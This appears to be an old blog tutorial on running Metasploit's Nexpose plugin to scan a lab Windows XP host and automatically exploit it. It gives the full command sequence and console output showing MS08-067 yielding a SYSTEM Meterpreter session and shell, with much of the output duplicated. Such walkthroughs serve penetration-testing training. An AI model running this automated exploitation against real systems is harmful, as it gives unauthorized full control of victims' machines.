In last post I had told u how to install Nexpose on Backtrack4RC2,today we will see how to use Nexpose through msf.
Metasploit has Nexpose plugin were we can login to Nexpose scan the Target System and import the Scan Results to Metasploit,,then msf will check for the exploits Matching those vulnerabilities and it automatically run those exploits if the target system is vulnerable then get us a Interactive Shell,Lets begin
1)Run the Nexpose scanner
2)start the metasploit
root@bt:/pentest/exploits/framework3# ./msfconsole
msf > db_driver sqlite3
msf > db_create
msf > load nexpose
msf > nexpose_connect kislay:gotroot@127.0.0.1
msf > nexpose_scan -x 192.168.1.4
msf > sessions -i 1
Above are the total commands run to get the shell by MSF and NeXpose, below is the working.
root@bt:/pentest/exploits/framework3# ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ — –=[ 636 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)
+ — –=[ 636 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)
Warning: This copy of the Metasploit Framework was last updated 2 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS’s administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS’s administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose
____ _ _ _____ _ _ __ __
| _ \ __ _ _ __ (_) __| |___ | | \ | | ___\ \/ /_ __ ___ ___ ___
| |_) / _` | ‘_ \| |/ _` | / / | \| |/ _ \\ /| ‘_ \ / _ \/ __|/ _ \
| _ < (_| | |_) | | (_| | / / | |\ | __// \| |_) | (_) \__ \ __/
|_| \_\__,_| .__/|_|\__,_|/_/ |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_| |_|
| _ \ __ _ _ __ (_) __| |___ | | \ | | ___\ \/ /_ __ ___ ___ ___
| |_) / _` | ‘_ \| |/ _` | / / | \| |/ _ \\ /| ‘_ \ / _ \/ __|/ _ \
| _ < (_| | |_) | | (_| | / / | |\ | __// \| |_) | (_) \__ \ __/
|_| \_\__,_| .__/|_|\__,_|/_/ |_| \_|\___/_/\_\ .__/ \___/|___/\___|
|_| |_|
[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect kislay:gotroot@127.0.0.1
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username kislay…
msf > nexpose_scan -x 192.168.1.4
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.1.4:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] 192.168.1.4:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.4:445…
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.4:445…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.1.7:18282 -> 192.168.1.4:1067) at Sat Dec 11 03:40:01 -0500 2010
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution…
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect kislay:gotroot@127.0.0.1
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username kislay…
msf > nexpose_scan -x 192.168.1.4
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.1.4:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos, CVE-2008-4250, CVE-2008-4250, OSVDB-49243, MSB-MS08-067, NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*] 192.168.1.4:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.4:445…
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.4:445…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution…
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution…
[*] Meterpreter session 1 opened (192.168.1.7:18282 -> 192.168.1.4:1067) at Sat Dec 11 03:40:01 -0500 2010
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution…
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
===============
Id Type Information Connection Via
– —- ———– ———- —
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ TESTBOX-85474D5 192.168.1.7:18282 -> 192.168.1.4:1067 exploit/windows/smb/ms08_067_netapi
– —- ———– ———- —
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ TESTBOX-85474D5 192.168.1.7:18282 -> 192.168.1.4:1067 exploit/windows/smb/ms08_067_netapi
[*] ================================================================================
msf > sessions -i 1
[*] Starting interaction with 1…
[*] Starting interaction with 1…
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
IP Address. . . . . . . . . . . . : 192.168.1.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
C:\WINDOWS\system32>exit
